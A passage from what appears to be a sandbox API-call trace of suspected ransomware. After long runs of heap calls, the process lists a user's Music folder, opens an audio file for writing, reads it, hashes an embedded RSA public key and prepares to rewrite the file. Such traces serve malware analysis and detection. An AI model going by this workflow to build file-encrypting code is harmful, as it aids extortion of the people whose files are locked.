returned 0x2ae2e30 [0189.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.818] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0189.818] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.818] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.818] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.818] PathFindFileNameW (pszPath="") returned="" [0189.818] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\*" (normalized: "c:\\users\\keecfmwgj\\music\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0189.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.819] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.819] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26350e0, ftCreationTime.dwHighDateTime=0x1d8a4c7, ftLastAccessTime.dwLowDateTime=0x9e0041c0, ftLastAccessTime.dwHighDateTime=0x1d8a585, ftLastWriteTime.dwLowDateTime=0x9e0041c0, ftLastWriteTime.dwHighDateTime=0x1d8a585, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="26hKDH", cAlternateFileName="")) returned 1 [0189.819] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49396f90, ftCreationTime.dwHighDateTime=0x1d8a10c, ftLastAccessTime.dwLowDateTime=0x2809600, ftLastAccessTime.dwHighDateTime=0x1d8a11b, ftLastWriteTime.dwLowDateTime=0x2809600, ftLastWriteTime.dwHighDateTime=0x1d8a11b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5U0VVnc3NrOc8n_Z", cAlternateFileName="5U0VVN~1")) returned 1 [0189.819] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75326790, ftCreationTime.dwHighDateTime=0x1d89da2, ftLastAccessTime.dwLowDateTime=0x2f70c9e0, ftLastAccessTime.dwHighDateTime=0x1d8a6b2, ftLastWriteTime.dwLowDateTime=0x2f70c9e0, ftLastWriteTime.dwHighDateTime=0x1d8a6b2, nFileSizeHigh=0x0, nFileSizeLow=0x7fe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="85NDX4GNPa9.m4a", cAlternateFileName="85NDX4~1.M4A")) returned 1 [0189.820] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\85NDX4GNPa9.m4a") returned=".m4a" [0189.820] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\85NDX4GNPa9.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\85ndx4gnpa9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.821] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=32738) returned 1 [0189.821] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.824] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7fbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.824] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.826] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.827] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x7fe2, lpOverlapped=0x0) returned 1 [0189.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.828] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.829] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.829] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.829] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.829] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.829] GetLastError () returned 0x0 [0189.829] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.829] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.830] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.830] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.830] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7fe0) returned 0x2af5168 [0189.830] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x300fe8 